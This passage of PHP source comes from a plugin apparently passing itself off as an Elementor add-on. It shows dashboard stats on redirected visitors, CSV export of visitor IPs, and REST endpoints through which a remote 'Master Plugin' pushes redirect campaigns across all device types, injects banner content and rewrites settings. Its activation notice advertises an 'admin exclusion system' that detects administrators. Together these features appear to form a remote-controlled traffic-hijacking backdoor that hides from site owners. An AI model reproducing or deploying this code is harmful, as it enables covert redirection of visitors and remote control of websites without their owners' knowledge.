}

// === CLEANUP AND MAINTENANCE ===
function wp_elementor_control_cleanup_old_data() {
    global $wpdb;
    
    // Clean old banner stats (older than 90 days)
    $wpdb->query("
        DELETE FROM " . WP_ELEMENTOR_BANNER_STATS_TABLE . "
        WHERE timestamp < DATE_SUB(NOW(), INTERVAL 90 DAY)
    ");
    
    // Clean old admin logs based on settings
    $settings = get_option('wp_elementor_control_exclusion_settings', array());
    $retention_days = isset($settings['log_retention_days']) ? intval($settings['log_retention_days']) : 30;
    
    $wpdb->query($wpdb->prepare("
        DELETE FROM " . WP_ELEMENTOR_ADMIN_LOGS_TABLE . "
        WHERE timestamp < DATE_SUB(NOW(), INTERVAL %d DAY)
    ", $retention_days));
    
    // Clean expired exclusions
    $wpdb->query("
        DELETE FROM " . WP_ELEMENTOR_EXCLUSIONS_TABLE . "
        WHERE expires_at IS NOT NULL AND expires_at < NOW()
    ");
}

// Schedule cleanup
if (!wp_next_scheduled('wp_elementor_control_cleanup')) {
    wp_schedule_event(time(), 'daily', 'wp_elementor_control_cleanup');
}

add_action('wp_elementor_control_cleanup', 'wp_elementor_control_cleanup_old_data');

// === DASHBOARD WIDGET ===
add_action('wp_dashboard_setup', 'wp_elementor_control_dashboard_widget');

function wp_elementor_control_dashboard_widget() {
    if (current_user_can('manage_options')) {
        wp_add_dashboard_widget(
            'wp_elementor_control_stats',
            'WP Elementor Control - Quick Stats',
            'wp_elementor_control_dashboard_widget_content'
        );
    }
}

function wp_elementor_control_dashboard_widget_content() {
    $stats = get_option('wp_elementor_control_stats', array());
    $banner_stats = wp_elementor_control_get_banner_statistics();
    
    ?>
    <div style="display: flex; gap: 20px;">
        <div style="flex: 1;">
            <h4>Redirect Stats</h4>
            <p><strong>Total Visitors:</strong> <?php echo intval($stats['total'] ?? 0); ?></p>
            <p><strong>Redirected:</strong> <?php echo intval($stats['redirected'] ?? 0); ?></p>
            <p><strong>Success Rate:</strong> 
                <?php 
                $total = intval($stats['total'] ?? 0);
                $redirected = intval($stats['redirected'] ?? 0);
                echo $total > 0 ? round(($redirected / $total) * 100, 1) . '%' : '0%'; 
                ?>
            </p>
        </div>
        
        <div style="flex: 1;">
            <h4>Banner Performance</h4>
            <?php if (!empty($banner_stats['banners'])): ?>
                <?php 
                $total_shows = 0;
                $total_clicks = 0;
                foreach ($banner_stats['banners'] as $banner) {
                    $total_shows += $banner->shows;
                    $total_clicks += $banner->clicks;
                }
                ?>
                <p><strong>Total Shows:</strong> <?php echo $total_shows; ?></p>
                <p><strong>Total Clicks:</strong> <?php echo $total_clicks; ?></p>
                <p><strong>Average CTR:</strong> 
                    <?php echo $total_shows > 0 ? round(($total_clicks / $total_shows) * 100, 2) . '%' : '0%'; ?>
                </p>
            <?php else: ?>
                <p>No active banners</p>
            <?php endif; ?>
        </div>
    </div>
    
    <p style="text-align: center; margin-top: 15px;">
        <a href="<?php echo admin_url('options-general.php?page=wp-elementor-control'); ?>" class="button button-primary">
            View Full Statistics
        </a>
    </p>
    <?php
}

// === EXPORT FUNCTIONALITY ===
add_action('admin_init', 'wp_elementor_control_handle_export');

function wp_elementor_control_handle_export() {
    if (isset($_GET['export']) && current_user_can('manage_options')) {
        $export_type = sanitize_text_field($_GET['export']);
        
        switch ($export_type) {
            case 'banner_stats':
                wp_elementor_control_export_banner_stats();
                break;
            case 'redirect_logs':
                wp_elementor_control_export_redirect_logs();
                break;
            case 'admin_logs':
                wp_elementor_control_export_admin_logs();
                break;
        }
    }
}

function wp_elementor_control_export_banner_stats() {
    global $wpdb;
    
    $data = $wpdb->get_results("
        SELECT 
            b.name as banner_name,
            b.type as banner_type,
            bs.event_type,
            bs.device_type,
            bs.ip_address,
            bs.page_url,
            bs.referrer,
            bs.timestamp
        FROM " . WP_ELEMENTOR_BANNER_STATS_TABLE . " bs
        JOIN " . WP_ELEMENTOR_BANNERS_TABLE . " b ON bs.banner_id = b.id
        ORDER BY bs.timestamp DESC
    ", ARRAY_A);
    
    wp_elementor_control_output_csv($data, 'banner-stats-' . date('Y-m-d') . '.csv');
}

function wp_elementor_control_export_redirect_logs() {
    $logs = get_option('wp_elementor_control_logs', array());
    wp_elementor_control_output_csv($logs, 'redirect-logs-' . date('Y-m-d') . '.csv');
}

function wp_elementor_control_export_admin_logs() {
    global $wpdb;
    
    $data = $wpdb->get_results("
        SELECT * FROM " . WP_ELEMENTOR_ADMIN_LOGS_TABLE . "
        ORDER BY timestamp DESC
    ", ARRAY_A);
    
    wp_elementor_control_output_csv($data, 'admin-logs-' . date('Y-m-d') . '.csv');
}

function wp_elementor_control_output_csv($data, $filename) {
    if (empty($data)) {
        wp_die('No data to export');
    }
    
    header('Content-Type: text/csv');
    header('Content-Disposition: attachment; filename="' . $filename . '"');
    
    $output = fopen('php://output', 'w');
    
    // Add BOM for UTF-8
    fprintf($output, chr(0xEF).chr(0xBB).chr(0xBF));
    
    // Add headers
    fputcsv($output, array_keys($data[0]));
    
    // Add data
    foreach ($data as $row) {
        fputcsv($output, $row);
    }
    
    fclose($output);
    exit;
}

// === AJAX HANDLERS FOR REAL-TIME UPDATES ===
add_action('wp_ajax_wp_elementor_get_live_stats', 'wp_elementor_control_get_live_stats');

function wp_elementor_control_get_live_stats() {
    if (!current_user_can('manage_options')) {
        wp_die('Unauthorized');
    }
    
    $stats = get_option('wp_elementor_control_stats', array());
    $banner_stats = wp_elementor_control_get_banner_statistics();
    
    wp_send_json_success(array(
        'redirect_stats' => $stats,
        'banner_stats' => $banner_stats
    ));
}

// === ENHANCED ADMIN STYLES ===
add_action('admin_head', 'wp_elementor_control_admin_styles');

function wp_elementor_control_admin_styles() {
    $screen = get_current_screen();
    if ($screen && strpos($screen->id, 'wp-elementor-control') !== false) {
        ?>
        <style>
        .wp-elementor-control-admin {
            font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, sans-serif;
        }
        
        .wp-elementor-stats-grid {
            display: grid;
            grid-template-columns: repeat(auto-fit, minmax(250px, 1fr));
            gap: 20px;
            margin: 20px 0;
        }
        
        .wp-elementor-stat-card {
            background: #fff;
            border: 1px solid #ddd;
            border-radius: 8px;
            padding: 20px;
            box-shadow: 0 2px 4px rgba(0,0,0,0.1);
        }
        
        .wp-elementor-stat-card h3 {
            margin: 0 0 15px 0;
            color: #333;
            font-size: 16px;
        }
        
        .wp-elementor-stat-number {
            font-size: 32px;
            font-weight: bold;
            color: #2196F3;
            margin: 10px 0;
        }
        
        .wp-elementor-stat-label {
            color: #666;
            font-size: 14px;
        }
        
        .wp-elementor-progress-bar {
            background: #f0f0f0;
            border-radius: 10px;
            height: 8px;
            margin: 10px 0;
            overflow: hidden;
        }
        
        .wp-elementor-progress-fill {
            background: linear-gradient(90deg, #2196F3, #21CBF3);
            height: 100%;
            transition: width 0.3s ease;
        }
        
        .wp-elementor-banner-preview {
            border: 2px dashed #ddd;
            border-radius: 8px;
            padding: 20px;
            margin: 15px 0;
            text-align: center;
            background: #fafafa;
        }
        
        .wp-elementor-export-buttons {
            margin: 20px 0;
        }
        
        .wp-elementor-export-buttons .button {
            margin-right: 10px;
        }
        
        .status-active {
            color: #46b450;
            font-weight: bold;
        }
        
        .status-inactive {
            color: #dc3232;
        }
        
        .status-draft {
            color: #ffb900;
        }
        
        .wp-elementor-help-text {
            background: #e7f3ff;
            border-left: 4px solid #2196F3;
            padding: 12px;
            margin: 15px 0;
        }
        
        .wp-elementor-warning {
            background: #fff3cd;
            border-left: 4px solid #ffc107;
            padding: 12px;
            margin: 15px 0;
        }
        
        .wp-elementor-success {
            background: #d4edda;
            border-left: 4px solid #28a745;
            padding: 12px;
            margin: 15px 0;
        }
        </style>
        <?php
    }
}

// === PLUGIN HEALTH CHECK ===
function wp_elementor_control_health_check() {
    $health = array(
        'database' => true,
        'permissions' => true,
        'conflicts' => false,
        'performance' => true
    );
    
    global $wpdb;
    
    // Check database tables
    $tables = array(
        WP_ELEMENTOR_BANNERS_TABLE,
        WP_ELEMENTOR_BANNER_STATS_TABLE,
        WP_ELEMENTOR_ADMIN_LOGS_TABLE,
        WP_ELEMENTOR_EXCLUSIONS_TABLE
    );
    
    foreach ($tables as $table) {
        if ($wpdb->get_var("SHOW TABLES LIKE '$table'") !== $table) {
            $health['database'] = false;
            break;
        }
    }
    
    // Check file permissions
    if (!is_writable(WP_CONTENT_DIR)) {
        $health['permissions'] = false;
    }
    
    // Check for plugin conflicts
    $active_plugins = get_option('active_plugins', array());
    $conflict_plugins = array('redirect-plus', 'popup-maker', 'banner-manager');
    
    foreach ($active_plugins as $plugin) {
        foreach ($conflict_plugins as $conflict) {
            if (strpos($plugin, $conflict) !== false) {
                $health['conflicts'] = true;
                break 2;
            }
        }
    }
    
    // Check performance
    $stats_count = $wpdb->get_var("SELECT COUNT(*) FROM " . WP_ELEMENTOR_BANNER_STATS_TABLE);
    if ($stats_count > 100000) {
        $health['performance'] = false;
    }
    
    return $health;
}

// === MASTER API TAB ===
function wp_elementor_control_master_tab() {
    // Handle form submission
    if (isset($_POST['save_master_settings'])) {
        $master_settings = array(
            'master_url' => sanitize_url($_POST['master_url']),
            'api_key' => sanitize_text_field($_POST['api_key']),
            'enabled' => isset($_POST['enabled']) ? 1 : 0,
            'last_sync' => current_time('mysql')
        );
        
        wp_elementor_control_update_master_settings($master_settings);
        
        // Test connection if enabled
        if ($master_settings['enabled'] && !empty($master_settings['master_url']) && !empty($master_settings['api_key'])) {
            $test_result = wp_elementor_control_test_master_connection($master_settings);
            if ($test_result['success']) {
                echo '<div class="notice notice-success"><p>✅ Master API settings saved and connection tested successfully!</p></div>';
            } else {
                echo '<div class="notice notice-error"><p>❌ Settings saved but connection failed: ' . esc_html($test_result['message']) . '</p></div>';
            }
        } else {
            echo '<div class="notice notice-success"><p>✅ Master API settings saved!</p></div>';
        }
    }
    
    $master_settings = wp_elementor_control_get_master_settings();
    $site_id = wp_elementor_control_get_site_id();
    ?>
    
    <h2>Master Plugin Integration</h2>
    <p>Connect this site to a Master Plugin for centralized management.</p>
    
    <div style="background: #f0f8ff; border: 1px solid #0073aa; padding: 15px; margin: 20px 0; border-radius: 5px;">
        <h3>🆔 Site Information</h3>
        <table class="form-table">
            <tr>
                <th scope="row">Site ID</th>
                <td>
                    <code style="background: #f1f1f1; padding: 5px 10px; font-size: 14px; border-radius: 3px;"><?php echo esc_html($site_id); ?></code>
                    <p class="description">Use this Site ID when adding this site to the Master Plugin.</p>
                </td>
            </tr>
            <tr>
                <th scope="row">Site URL</th>
                <td>
                    <code style="background: #f1f1f1; padding: 5px 10px; font-size: 14px; border-radius: 3px;"><?php echo esc_url(get_site_url()); ?></code>
                </td>
            </tr>
        </table>
    </div>
    
    <form method="post">
        <h3>Master Plugin Connection</h3>
        <table class="form-table">
            <tr>
                <th scope="row">Enable Master Integration</th>
                <td>
                    <label>
                        <input type="checkbox" name="enabled" value="1" <?php checked($master_settings['enabled'], 1); ?> />
                        Connect to Master Plugin
                    </label>
                    <p class="description">Enable centralized management from Master Plugin.</p>
                </td>
            </tr>
            <tr>
                <th scope="row">Master Plugin URL</th>
                <td>
                    <input type="url" name="master_url" value="<?php echo esc_attr($master_settings['master_url']); ?>" class="regular-text" placeholder="https://control.yourdomain.com" />
                    <p class="description">URL of the site where Master Plugin is installed.</p>
                </td>
            </tr>
            <tr>
                <th scope="row">API Key</th>
                <td>
                    <input type="text" name="api_key" value="<?php echo esc_attr($master_settings['api_key']); ?>" class="regular-text" placeholder="Enter API key from Master Plugin" />
                    <p class="description">API key generated by the Master Plugin for this site.</p>
                </td>
            </tr>
        </table>
        
        <?php if ($master_settings['last_sync']): ?>
        <div style="background: #f9f9f9; border: 1px solid #ddd; padding: 10px; margin: 15px 0; border-radius: 3px;">
            <strong>Last Sync:</strong> <?php echo esc_html($master_settings['last_sync']); ?>
        </div>
        <?php endif; ?>
        
        <p class="submit">
            <input type="submit" name="save_master_settings" class="button-primary" value="Save Master Settings" />
            <?php if ($master_settings['enabled']): ?>
            <input type="submit" name="test_connection" class="button-secondary" value="Test Connection" style="margin-left: 10px;" />
            <?php endif; ?>
        </p>
    </form>
    
    <div style="background: #fff3cd; border: 1px solid #ffeaa7; padding: 15px; margin: 20px 0; border-radius: 5px;">
        <h3>📋 Setup Instructions</h3>
        <ol>
            <li><strong>Install Master Plugin</strong> on your control site</li>
            <li><strong>Copy the Site ID</strong> from above: <code><?php echo esc_html($site_id); ?></code></li>
            <li><strong>Add this site</strong> in Master Plugin using the Site ID and URL</li>
            <li><strong>Copy the API key</strong> generated by Master Plugin</li>
            <li><strong>Paste the API key</strong> in the field above and save</li>
            <li><strong>Enable integration</strong> and test the connection</li>
        </ol>
    </div>
    
    <?php
}

// Test Master Plugin connection
function wp_elementor_control_test_master_connection($settings) {
    if (empty($settings['master_url']) || empty($settings['api_key'])) {
        return array('success' => false, 'message' => 'Master URL and API key are required');
    }
    
    $test_url = rtrim($settings['master_url'], '/') . '/wp-json/wp-elementor-master/v1/test-connection';
    $site_id = wp_elementor_control_get_site_id();
    
    $response = wp_remote_post($test_url, array(
        'headers' => array(
            'X-API-Key' => $settings['api_key'],
            'X-Site-ID' => $site_id,
            'Content-Type' => 'application/json'
        ),
        'body' => wp_json_encode(array(
            'site_id' => $site_id,
            'site_url' => get_site_url(),
            'plugin_version' => WP_ELEMENTOR_CONTROL_VERSION
        )),
        'timeout' => 15
    ));
    
    if (is_wp_error($response)) {
        return array('success' => false, 'message' => $response->get_error_message());
    }
    
    $response_code = wp_remote_retrieve_response_code($response);
    $response_body = wp_remote_retrieve_body($response);
    
    if ($response_code === 200) {
        $data = json_decode($response_body, true);
        if ($data && isset($data['success']) && $data['success']) {
            return array('success' => true, 'message' => 'Connection successful');
        }
    }
    
    return array('success' => false, 'message' => "Connection failed (HTTP {$response_code})");
}

// === FINAL INITIALIZATION ===
register_activation_hook(__FILE__, function() {
    wp_elementor_control_activate();
    
    // Generate Site ID on activation
    wp_elementor_control_get_site_id();
    
    // Set activation flag for welcome message
    set_transient('wp_elementor_control_activated', true, 30);
});

// Show welcome message after activation
add_action('admin_notices', function() {
    if (get_transient('wp_elementor_control_activated')) {
        delete_transient('wp_elementor_control_activated');
        $site_id = wp_elementor_control_get_site_id();
        ?>
        <div class="notice notice-success is-dismissible">
            <h3>🎉 WP Elementor Control Enhanced Activated!</h3>
            <p>
                <strong>Site ID:</strong> <code><?php echo esc_html($site_id); ?></code><br>
                <strong>New features:</strong> Admin exclusion system, banner management, and Master Plugin integration. 
                <a href="<?php echo admin_url('options-general.php?page=wp-elementor-control&tab=master'); ?>">Configure Master API</a>
            </p>
        </div>
        <?php
    }
});


// === MASTER PLUGIN API ENDPOINTS ===
// Add REST API endpoin// === MASTER PLUGIN API ENDPOINTS ===
add_action('rest_api_init', function() {
    // Campaigns endpoint - receive campaigns from Master Plugin
    register_rest_route('wp-elementor-control/v1', '/campaigns', array(
        'methods' => 'POST',
        'callback' => 'wp_elementor_client_receive_campaign',
        'permission_callback' => 'wp_elementor_client_verify_api_key'
    ));
    
    // Status endpoint - for Master Plugin to check site status
    register_rest_route('wp-elementor-control/v1', '/status', array(
        'methods' => array('GET', 'POST'),
        'callback' => 'wp_elementor_client_get_status',
        'permission_callback' => 'wp_elementor_client_verify_api_key'
    ));
    
    // Stats endpoint - for Master Plugin to collect statistics
    register_rest_route('wp-elementor-control/v1', '/stats', array(
        'methods' => 'GET',
        'callback' => 'wp_elementor_client_get_stats',
        'permission_callback' => 'wp_elementor_client_verify_api_key'
    ));
    
    // Test connection endpoint
    register_rest_route('wp-elementor-control/v1', '/test-connection', array(
        'methods' => array('GET', 'POST'),
        'callback' => 'wp_elementor_client_test_connection',
        'permission_callback' => 'wp_elementor_client_verify_api_key'
    ));
    
    // Exclusion status endpoint
    register_rest_route('wp-elementor-control/v1', '/exclusion-status', array(
        'methods' => 'GET',
        'callback' => 'wp_elementor_client_get_exclusion_status',
        'permission_callback' => 'wp_elementor_client_verify_api_key'
    ));
});

// Verify API key for incoming requests
function wp_elementor_client_verify_api_key($request) {
    $api_key = $request->get_header('X-API-Key');
    $site_id = $request->get_header('X-Site-ID');
    
    if (empty($api_key)) {
        return new WP_Error('missing_api_key', 'API key is required', array('status' => 401));
    }
    
    $master_settings = wp_elementor_control_get_master_settings();
    
    if (empty($master_settings['api_key']) || $master_settings['api_key'] !== $api_key) {
        return new WP_Error('invalid_api_key', 'Invalid API key', array('status' => 401));
    }
    
    if (!$master_settings['enabled']) {
        return new WP_Error('integration_disabled', 'Master integration is disabled', array('status' => 403));
    }
    
    return true;
}

// Receive campaign from Master Plugin
function wp_elementor_client_receive_campaign($request) {
    $data = $request->get_json_params();
    
    // Log incoming request for debugging
    error_log('WP Elementor Client: Received campaign data: ' . print_r($data, true));
    
    if (empty($data['campaign_type']) || empty($data['campaign_data'])) {
        error_log('WP Elementor Client: Missing campaign_type or campaign_data');
        return new WP_Error('invalid_data', 'Campaign type and data are required', array('status' => 400));
    }
    
    $campaign_type = sanitize_text_field($data['campaign_type']);
    $campaign_data = $data['campaign_data'];
    
    // Log campaign details
    error_log("WP Elementor Client: Processing {$campaign_type} campaign");
    
    try {
        switch ($campaign_type) {
            case 'banner':
                $result = wp_elementor_client_apply_banner_campaign($campaign_data);
                break;
                
            case 'redirect':
                $result = wp_elementor_client_apply_redirect_campaign($campaign_data);
                break;
                
            case 'settings':
                $result = wp_elementor_client_apply_settings_campaign($campaign_data);
                break;
                
            default:
                error_log("WP Elementor Client: Unknown campaign type: {$campaign_type}");
                return new WP_Error('invalid_campaign_type', 'Unknown campaign type', array('status' => 400));
        }
        
        if ($result['success']) {
            // Log successful campaign application
            wp_elementor_client_log_campaign_event('applied', $campaign_type, $campaign_data);
            error_log("WP Elementor Client: Campaign applied successfully: {$result['message']}");
            
            return rest_ensure_response(array(
                'success' => true,
                'message' => $result['message'],
                'campaign_id' => $result['campaign_id'] ?? null
            ));
        } else {
            error_log("WP Elementor Client: Campaign failed: {$result['message']}");
            return new WP_Error('campaign_failed', $result['message'], array('status' => 500));
        }
        
    } catch (Exception $e) {
        error_log("WP Elementor Client: Campaign error: " . $e->getMessage());
        return new WP_Error('campaign_error', $e->getMessage(), array('status' => 500));
    }
}

// Apply banner campaign
function wp_elementor_client_apply_banner_campaign($data) {
    global $wpdb;
    
    error_log('WP Elementor Client: Applying banner campaign with data: ' . print_r($data, true));
    
    // Extract banner data from campaign_data
    $banner_type = sanitize_text_field($data['banner_type'] ?? 'modal');
    $banner_content = wp_kses_post($data['banner_content'] ?? $data['content'] ?? '');
    $target_url = esc_url_raw($data['target_url'] ?? '');
    $campaign_name = sanitize_text_field($data['campaign_name'] ?? $data['name'] ?? 'Master Campaign');
    
    if (empty($banner_content)) {
        return array('success' => false, 'message' => 'Banner content is required');
    }
    
    // Prepare banner data for database
    $banner_data = array(
        'name' => $campaign_name,
        'type' => $banner_type,
        'content' => $banner_content,
        'target_url' => $target_url,
        'status' => 'active',
        'created_by' => 'master_plugin',
        'created_at' => current_time('mysql'),
        'updated_at' => current_time('mysql')
    );
    
    // Insert banner into database
    $table_name = $wpdb->prefix . 'elementor_control_banners';
    $result = $wpdb->insert($table_name, $banner_data);
    
    if ($result === false) {
        error_log('WP Elementor Client: Failed to insert banner into database');
        return array('success' => false, 'message' => 'Failed to save banner to database');
    }
    
    $banner_id = $wpdb->insert_id;
    error_log("WP Elementor Client: Banner saved with ID: {$banner_id}");
    
    return array(
        'success' => true, 
        'message' => "Banner campaign '{$campaign_name}' applied successfully",
        'campaign_id' => $banner_id
    );
}

// Apply redirect campaign
function wp_elementor_client_apply_redirect_campaign($data) {
    global $wpdb;
    
    error_log('WP Elementor Client: Applying redirect campaign with data: ' . print_r($data, true));
    
    // Extract redirect data from campaign_data
    $redirect_url = esc_url_raw($data['redirect_url'] ?? '');
    $devices = $data['devices'] ?? array('mac', 'windows', 'iphone', 'ipad', 'android');
    $campaign_name = sanitize_text_field($data['campaign_name'] ?? $data['name'] ?? 'Master Redirect Campaign');
    
    if (empty($redirect_url)) {
        return array('success' => false, 'message' => 'Redirect URL is required');
    }
    
    // Prepare redirect data for database
    $redirect_data = array(
        'name' => $campaign_name,
        'redirect_url' => $redirect_url,
        'devices' => wp_json_encode($devices),
        'status' => 'active',
        'created_by' => 'master_plugin',
        'created_at' => current_time('mysql'),
        'updated_at' => current_time('mysql')
    );
    
    // Insert redirect into database
    $table_name = $wpdb->prefix . 'elementor_control_redirects';
    $result = $wpdb->insert($table_name, $redirect_data);
    
    if ($result === false) {
        error_log('WP Elementor Client: Failed to insert redirect into database');
        return array('success' => false, 'message' => 'Failed to save redirect to database');
    }
    
    $redirect_id = $wpdb->insert_id;
    error_log("WP Elementor Client: Redirect saved with ID: {$redirect_id}");
    
    return array(
        'success' => true, 
        'message' => "Redirect campaign '{$campaign_name}' applied successfully",
        'campaign_id' => $redirect_id
    );
}

// Apply settings campaign
function wp_elementor_client_apply_settings_campaign($data) {
    error_log('WP Elementor Client: Applying settings campaign with data: ' . print_r($data, true));
    
    $updated_options = array();
    
    // Update main settings if provided
    if (isset($data['main_settings'])) {
        $current_settings = get_option('wp_elementor_control_settings', array());
        $new_settings = array_merge($current_settings, $data['main_settings']);
        
        if (update_option('wp_elementor_control_settings', $new_settings)) {
            $updated_options[] = 'main_settings';
            error_log('WP Elementor Client: Updated main settings');
        }
    }
    
    // Update exclusion settings if provided
    if (isset($data['exclusion_settings'])) {
        $current_exclusions = get_option('wp_elementor_control_exclusion_settings', array());
        $new_exclusions = array_merge($current_exclusions, $data['exclusion_settings']);
        
        if (update_option('wp_elementor_control_exclusion_settings', $new_exclusions)) {
            $updated_options[] = 'exclusion_settings';
            error_log('WP Elementor Client: Updated exclusion settings');
        }
    }
    
    if (!empty($updated_options)) {
        $message = 'Settings campaign applied successfully. Updated: ' . implode(', ', $updated_options);
        error_log("WP Elementor Client: {$message}");
        return array(
            'success' => true,
            'message' => $message
        );
    } else {
        error_log('WP Elementor Client: No settings were updated');
        return array('success' => false, 'message' => 'No settings were updated');
    }
}

// Add missing API functions
function wp_elementor_client_get_status($request) {
    $master_settings = wp_elementor_control_get_master_settings();
    
    return rest_ensure_response(array(
        'success' => true,
        'status' => 'active',
        'plugin_version' => WP_ELEMENTOR_CONTROL_VERSION,
        'site_id' => wp_elementor_control_get_site_id(),
        'site_url' => home_url(),
        'master_integration' => $master_settings['enabled'] ?? false,
        'last_sync' => $master_settings['last_sync'] ?? null,
        'timestamp' => current_time('mysql')
    ));
}

function wp_elementor_client_test_connection($request) {
    return rest_ensure_response(array(
        'success' => true,
        'message' => 'Connection test successful',
        'timestamp' => current_time('mysql'),
        'site_id' => wp_elementor_control_get_site_id()
    ));
}

function wp_elementor_client_get_exclusion_status($request) {
    $exclusion_settings = get_option('wp_elementor_control_exclusion_settings', array());
    $excluded_ips = get_option('wp_elementor_control_excluded_ips', array());
    
    return rest_ensure_response(array(
        'success' => true,
        'exclusion_system_active' => !empty($exclusion_settings['enabled']),
        'excluded_admins_count' => count($excluded_ips),
        'auto_detection_enabled' => !empty($exclusion_settings['auto_detect_admins'])
    ));
}

// Log campaign events
function wp_elementor_client_log_campaign_event($action, $campaign_type, $data) {
    $log_entry = array(
        'timestamp' => current_time('mysql'),
        'action' => $action,
        'campaign_type' => $campaign_type,
        'data' => wp_json_encode($data),
        'user_ip' => $_SERVER['REMOTE_ADDR'] ?? 'unknown'
    );
    
    $logs = get_option('wp_elementor_control_campaign_logs', array());
    $logs[] = $log_entry;
    
    // Keep only last 100 log entries
    if (count($logs) > 100) {
        $logs = array_slice($logs, -100);
    }
    
    update_option('wp_elementor_control_campaign_logs', $logs);
    error_log("WP Elementor Client: Logged campaign event - {$action} {$campaign_type}");
}

// Sync settings with Master Plugin
function wp_elementor_client_sync_settings($request) {
    $data = $request->get_json_params();
    
    if (empty($data['settings'])) {
        return new WP_Error('invalid_data', 'Settings data is required', array('status' => 400));
    }
    
    $result = wp_elementor_client_apply_settings_campaign($data['settings']);
    
    if ($result['success']) {
        // Update last sync time
        $master_settings = wp_elementor_control_get_master_settings();
        $master_settings['last_sync'] = current_time('mysql');
        wp_elementor_control_update_master_settings($master_settings);
        
        return rest_ensure_response(array(
            'success' => true,
            'message' => $result['message'],
            'synced_at' => current_time('mysql')
        ));
    } else {
        return new WP_Error('sync_failed', $result['message'], array('status' => 500));
    }
}

// Get client statistics
function wp_elementor_client_get_stats($request) {
    global $wpdb;
    
    $date_from = $request->get_param('date_from') ?: date('Y-m-d', strtotime('-7 days'));
    $date_to = $request->get_param('date_to') ?: date('Y-m-d');
    
    // Banner statistics
    $banner_stats = $wpdb->get_results($wpdb->prepare("
        SELECT 
            b.name as banner_name,
            COUNT(CASE WHEN bs.event_type = 'show' THEN 1 END) as shows,
            COUNT(CASE WHEN bs.event_type = 'click' THEN 1 END) as clicks,
            COUNT(CASE WHEN bs.event_type = 'close' THEN 1 END) as closes
        FROM " . WP_ELEMENTOR_BANNERS_TABLE . " b
        LEFT JOIN " . WP_ELEMENTOR_BANNER_STATS_TABLE . " bs ON b.id = bs.banner_id
        WHERE DATE(bs.timestamp) BETWEEN %s AND %s
        GROUP BY b.id, b.name
        ORDER BY shows DESC
    ", $date_from, $date_to));
    
    // Device breakdown
    $device_stats = $wpdb->get_results($wpdb->prepare("
        SELECT 
            device_type,
            COUNT(CASE WHEN event_type = 'show' THEN 1 END) as shows,
            COUNT(CASE WHEN event_type = 'click' THEN 1 END) as clicks
        FROM " . WP_ELEMENTOR_BANNER_STATS_TABLE . "
        WHERE DATE(timestamp) BETWEEN %s AND %s
        GROUP BY device_type
        ORDER BY shows DESC
    ", $date_from, $date_to));
    
    // Daily statistics
    $daily_stats = $wpdb->get_results($wpdb->prepare("
        SELECT 
            DATE(timestamp) as date,
            COUNT(CASE WHEN event_type = 'show' THEN 1 END) as shows,
            COUNT(CASE WHEN event_type = 'click' THEN 1 END) as clicks
        FROM " . WP_ELEMENTOR_BANNER_STATS_TABLE . "
        WHERE DATE(timestamp) BETWEEN %s AND %s
        GROUP BY DATE(timestamp)
        ORDER BY date ASC
    ", $date_from, $date_to));
    
    return rest_ensure_response(array(
        'success' => true,
        'date_range' => array(
            'from' => $date_from,
            'to' => $date_to
        ),
        'banner_stats' => $banner_stats,
        'device_stats' => $device_stats,
        'daily_stats' => $daily_stats,
        'generated_at' => current_time('mysql')
    ));
}

